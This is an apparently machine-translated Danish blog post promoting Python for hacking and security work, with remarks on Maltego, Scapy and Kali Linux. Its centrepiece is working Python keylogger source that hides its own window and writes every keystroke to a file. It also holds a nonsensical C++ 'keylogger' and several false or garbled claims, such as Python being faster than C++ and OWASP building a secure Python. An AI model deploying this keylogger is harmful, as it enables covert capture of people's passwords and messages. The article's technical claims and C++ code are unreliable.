Gray Hat Python - Så for to år tilbage lavede jeg min research til programmeringssprog, jeg begyndte at læse om C, C ++, Assembly, Python og Ruby. Jeg ville gerne blive ekspert inden for cybersikkerhed. Så jeg begyndte at lære så meget som jeg kan. Begyndte med at C, C ++ og C # var det grundlæggende, og efter at have lært og udarbejdet masser af programmer og vira begyndte jeg endelig at lære Kali Linux. For dem, der ikke ved, hvad Kali Linux er, er det et operativsystem til penetrationstest. Så jeg gik videre med mine studier, og hvad jeg så var, at de fleste af programmerne, vira og trojanere blev samlet i Python, og deres base var Ruby.

Så jeg stoppede mine studier for tiden og begyndte at lære Python eller for at være præcis Gray Hat Python og tadaa … Det var ekstremt let sammenlignet med C, C # eller andet sprog jeg lærte. Endelig fik jeg at vide, hvorfor Python var det mest anvendte sprog, og hvordan det blev berømt.
Så i dag ville jeg diskutere, hvordan Python omdannede til Gray Hat Python, og hvorfor det bruges så udstrakt, at selv Google og YouTube bruger det i deres database til at give så nøjagtige søgeresultater, som de kan.

Fra og med er Python et programmeringssprog på højt niveau, hvilket betyder, at dens syntakser er ekstremt nemme at læse, selv for begyndere. Hvis du er ny med programmeringen, ville dette være det sprog, jeg vil foreslå dig at starte med. Lad mig give dig et eksempel:

Sådan ser det ud i C: -

#include

int main()
(
printf("Hello world\n");
return 0;
)

Sådan ser det ud i Java: -

class HelloWorld
(
public static void main (String args())
(
System.out.println ("Hello World");
)
)

Og sådan ser det ud i Python (v2.7)

print "Hello World"

Enkel? Ja det er. Så Python var ikke kun let at skrive og forstå, men også meget kompakt. Så spørger du måske, hvordan har dette ført til Gray Hat Python?

Anbefalede kurser

  • IP-routingtræning
  • Hacking Training Course
  • Komplet RMAN-træning
  • Python-programmeringstræning

Python vs Gray Hat Python

Så hvad er egentlig Gray Hat Python? Hvorfor er det så forskelligt fra vores normale Python? Sagen er Gray Hat Python er intet andet end programmer skrevet i Python af Hackere, Network-Stress testere og Reverse Engineers til at oprette eller knække et program. Men udtrykket Gray Hat bruges, fordi det ikke er nøjagtigt en gavnlig eller en brugersoftware. Det bruges til at sikre eller oprette en sikkerhedsbrydende software.

Det kan let bruges til enten at teste begrænsningerne i et sikkert miljø eller til at bryde ind i et sikkert miljø. Det er hvad Gray Hat betyder. Og det er langt lettere at gøre det i Python snarere end at gøre det i C, C ++ eller java. Således navnet Gray Hat Python. Få eksempler jeg kan tænke på er:

• Skrivning af nøgleloggere (til hackere og pentestere)
• Skrivning af sikkerhedsshell-scripts (for netværksadministratorer)
• Skrivning af et automatiseret IDS (Intrusion Detection System for Security Engineers)

Så nu ved du hvorfor og hvordan Gray Hat Python er nyttigt. For at uddybe dette, lad mig give dig nogle detaljerede eksempler.
Du har muligvis hørt om Google App Engine. Google App Engine blev oprindeligt designet i Python, før den blev portet på. Google App er et rigtigt eksempel på et program skrevet i Python, fordi det tillader opbygning af webapplikationer ved hjælp af dens avancerede rige samling af biblioteker, værktøjer og rammer.

Nogensinde spekuleret på, hvorfor er det så let at søge på noget i Google? Det meste af tiden får du søgeresultater, der er 80% nøjagtige. Dette skyldes, at Python er ekstremt fleksibel, fungerer i høj hastighed, og databaserne er meget mere kompakte, selvom det gemmer 'n' antal oplysninger. Python er så udvidelig, at selv YouTube bruger det til formål som visning af video, kontrol af skabeloner, administration af video, adgang til kanoniske data og mange flere.

Google har sine crawlere og edderkopper, som indsamler data, så snart de uploades på nettet, uanset hvor eller hvor sikker det er. Man har bare brug for en ordentlig inspiration, tid og viden for at indsamle denne information.

Google-søgninger var tidligere baseret på Python, som det senere skiftede til C ++ for hastighedsoptimering, fordi Google-gennemsøgere gennemsøger mange sider pr. Python er i øjeblikket meget hurtigere end C ++, men det var ikke det samme tilfælde for nogle årtier siden.

Der var et berømt citat citeret af Google: -
“Python hvor vi kan, C ++ hvor vi skal.”

Så undrer du dig måske over, hvordan dette kan bruges til Hacking, Pentesting og Netværkssikkerhed. Jeg beder om at afvige. Hvis du kunne oprette et program, der er 70% -80% nøjagtigt i at give effektive søgeresultater, kan du sandsynligvis oprette et program, der kan forbinde websteder, søge smart og opbygge en profil af en person, som snarere kan bruges af individuelle sorte hatte til ondsindede formål. Lad enkeltpersoner til side, en hvis smart nok, let kan opbygge en applikation til opbygning af en virksomhedsprofil, hele træet fra dets rod til hvad du end kan tænke på …

Informationsindsamling via Maltego

Du tænker muligvis, at jeg overdriver lidt. Nej, jeg er IKKE!

Tænk på eksempler som Maltego. Maltego er en software, eller jeg kan bedre omformulere den som open source-kriminalteknisk applikation, bygget med det formål at indsamle information og opbygge profil for mennesker, firmaer og andre virksomhedsagenturer.

Man skal bare indtaste korrekte data i appen, og resten af ​​ting som at linke e-mails, mennesker, gruppe af mennesker, endda bestemme internetinfrastruktur som domæner, DNS-navne, Netblocks og IP-adresser kan kobles og forbindes ved hjælp af denne open source-intelligens .

For mere information besøg for at vide Hvad er Maltego?

Så hvis adgang til "Hemmelig information" bestemmer din succes, kan Maltego hjælpe dig med at opdage dem. Maltego er delvist skrevet i Python og bruger også Java, hvilket igen er et fantastisk sprog.

Så meget at citere om sikkerhed fra Google. For at være mere præcis er Google den mindste måde, du kan holde dig anonym på internettet, det betyder ikke noget, om du bruger inkognito eller www.duckduckgo.com fra chrome. For i sidste ende opdateres alt på nettet. Pointen med at være her er, det handler ikke om ufravigelighed, det handler om at være absolut sårbar. Man kan ikke helt tørre sig helt ud af Internettet. Men man kan helt sikkert prøve at beholde så mindre info på Internettet som muligt.

Python er ikke kun et sprog, det er et scriptingsprog. Skriptsprog giver dig mulighed for at skrive, ændre dine egne værktøjer, når du har brug for noget mere tilpasset. Disse netværkssikkerhedsværktøjer afhænger stærkt af scriptingsprog for at kunne udvides. Lad os for eksempel tage Scapy.

Scapy er rent skrevet i Python. Det er et kraftfuldt interaktivt værktøj til pakkemanipulation. Det kan generere falske pakker på egen hånd, scanne netværk og kan endda snuse pakker på netværket.

Find detaljerede oplysninger om Hvad er Scapy?

Nu er dette komplekse programmer skrevet af avancerede programmerere. Lad os se, hvor simpelt det er at skrive et program i Python, som let kan forstås af folk, der har nogle gode grundlæggende i programmering.

Dette er en keylogger skrevet i Python: -

#!/usr/bin/Python
import pyHook
import Pythoncom
import win32gui
import win32console
log_file = "log_file.txt" #name of log file
window = win32console. GetConsoleWindow() #go to script window
win32gui.ShowWindow (window, 0) #hide window
def pressed_chars(event): #on key pressed function
if event.Ascii:
f = open(log_file, "a") # (open log_file in append mode)
char = chr (event.Ascii) # (insert real char in variable)
if char == "q": # (if char is q)
f.close() # (close and save log file)
exit() # (exit program)
if event.Ascii == 13: # (if char is "return")
f.write("\n") # (new line)
f.write(char) # (write char)

proc = pyHook.HookManager() #open pyHook
proc.KeyDown = pressed_chars #set pressed_chars function on KeyDown event
proc.HookKeyboard() #start the function
Pythoncom.PumpMessages() #get input

Så dette er langt mere end let, hvis du spørger mig. Jeg har bare tilføjet modulerne pyhook, Pythoncom, win32gui og win32console, som du nemt kan downloade fra sourceforge-webstedet, og jeg har nævnt kommentarerne ved hjælp af hash-tagget. Men hvis jeg skal skrive det samme program i C ++, så lad os se, hvor svært det kan være.

Dette er et program skrevet i C ++: -

 #include #include #include #include int main(int argc, char ** agrv)( using namepace std; /*Easier*/ char std::vector input_STRUCT = ("S", "T", "O"); char std::vector input_STRUCT_1 = ("P", ""); char std::vector input_STRUCT_2 = ("L", "O", "O", "K", "I", "N", "G"); char std::vector input_STRUCT_3 = ("", "F", "O", "R"); char std::vector input_STRUCT_4 = ("M", "A", "L", "W"); char std::vector input_STRUCT_5 = ("A", "R", "E"); ostream os("C:\users\keylogger.txt"); int i; for( i = 0; i <=2; i++)( os << input_STRUCT(i); for(;i <= 1000000 ;i++)( ) ) for( i=0; i<=1;i++)( os << input_STRING_1(i); for(;i <= 1000000 ;i++)( ) ) for(i=0; i<=6; i++) ( os << input_STRING_2 (i); for(; i <= 1000000 ; i++)( ) for(i=0; i<=3;i++)( os << input_STRING_3(i); for(; i <= 1000000 ;i++)( ) ) for(i=0; i<=3; i++)( os << input_STRING_4(i); for(;i <= 1000000 ; i++)( ) ) for(i=0; i<=2; i++)( os << input_STRING_5(i); for(;i <= 1000000 ; i++)( ) ) os.close(); istream is (" C:\users\keylogger.txt "); cout << is; return 0; )

Så dette er temmelig stort sammenlignet med Python. Og hvis vi taler om effektivitet, kan Python let samles til en eksekverbar uden nogen anstrengelse ved hjælp af py2exe-software. Mens jeg taler om C ++, så ærligt talt, er denne kode en vittighed. For at skrive en ordentlig nøglelogger skal man skrive en DLL, der implementerer WH_KEYBOARD-krog. Desuden er denne kode langt væk fra at være let for en nybegynder at forstå.

Open source-hacking

Nu tager dette sig af Black Hat-hackere, som for at være mere præcise er de mennesker, der agter at ødelægge, manipulere data til deres egne behov. Når man taler fra synspunktet om sikkerhedsproblemer, er Python også nyttig for White Hat-hackere, der agter at redde samfundet fra angreb fra ondsindede hackere. Hvis du vil udvikle en karriere eller i det mindste ønsker at lære Python til sikkerhedsundersøgelser, kan du helt sikkert komme dybt ind med OWASP, BRO eller Quick NIX Secure Script.

OWASP er Open Web Application Security Project. OWASP sigter mod at skabe en mere sikker version af Python, der gør det lettere for sikkerhedsfagfolk og udviklere at skrive software, der er mindre udsat for angreb fra hackere. Det er relateret til Black-Box-analyse, identificering og adressering af sikkerhedsrelaterede problemer, der kan påvirke Pythons interaktive tolk.

BRO er et netværkssikkerheds- og trafikovervågningsprogram, hvorimod Quick NIX bruges til at hærde og sikre filejerskab på farten.

Da vi taler om sikkerhed, lad os tale om et operativsystem, der delvis er baseret på Python. Python fungerer godt sammen med UNIX, LINUX og Debian. Et af de mest berømte operativsystemer var Backtrack 5. Der blev frigivet forskellige versioner. Det var specielt designet til PenTesting. Senere troede folkene på Offensive Security, at Backtrack havde brug for en genstart, fordi de fleste værktøjer enten ikke fungerede korrekt eller ikke blev understøttet.

Senere frigav de Kali Linux, som var helt baseret på Debian. Og de fleste af dens rammer er enten i Ruby eller Python. Ruby er også et fantastisk scriptingsprog. Men jeg vil når som helst foretrække Python frem for det, fordi Python har et mere forskelligartet samfund med Linux og det er mere direkte og let at fejlsøge. Mens Ruby selvom den har masser af funktioner og er hurtig til at tilpasse sig det omgivende miljø, kan det være svært at debugge, svært at læse og er mere sofistikeret end Python.

Det bedste eksempel ville være som at sammenligne Apple vs Linux eller sammenligne iphone vs Android. Apple er rig på ressourcer og er ekstremt glat og er mere partisk over for begyndere. Mens Linux / Android er mere brugervenligt, lidt forsinket og kan undertiden være en hovedpine, hvis du ikke ved, hvordan du konfigurerer eller vedligeholder den.

Der er endda en bog baseret på Python Gray Hat Hacking af Justin Seitz. Den beskæftiger sig specifikt med at automatisere kedelig reverse engineering og sikkerhedsrelaterede opgaver, designe din egen debugger, bibliotek og DLL-injektion, sniffe sikker trafik over en krypteret session og bruge Immunity debugger, Sulley og mange flere. Det er en fantastisk bog, det betyder ikke noget, om du er nybegynder, eller om du er ekspert, du lærer altid den ene eller den anden ting hver gang du læser den.

Konklusion

Så hvis du er nybegynder, ville Python være det rigtige valg for dig at starte med som dit første sprog til programmeringssikkerhedstest.

Bare husk en ting til sidst Gray Hat Python er ikke kun et sprog, det er en måde at gøre tingene på en ordentlig og hurtig måde.

Første billedskilde: pixabay.com

Relaterede artikler:-

Her er nogle artikler, der hjælper dig med at få flere detaljer om Gray Hat Python, så bare gå gennem linket.

  1. Fordele ved cybersikkerhedsværktøjer, du skal være opmærksom på
  2. Karrierer i Python
  3. Top 25 fantastiske Python-interviewspørgsmål og svar
  4. Hvad er fordelene og begrænsningerne ved at bruge Python?
  5. Python vs Node.js
  6. Vejledning til spørgsmål om Cyber ​​Security Interview
  7. Forskellige typer værktøjer til sikkerhedstest

Kategori:

Softwareudvikling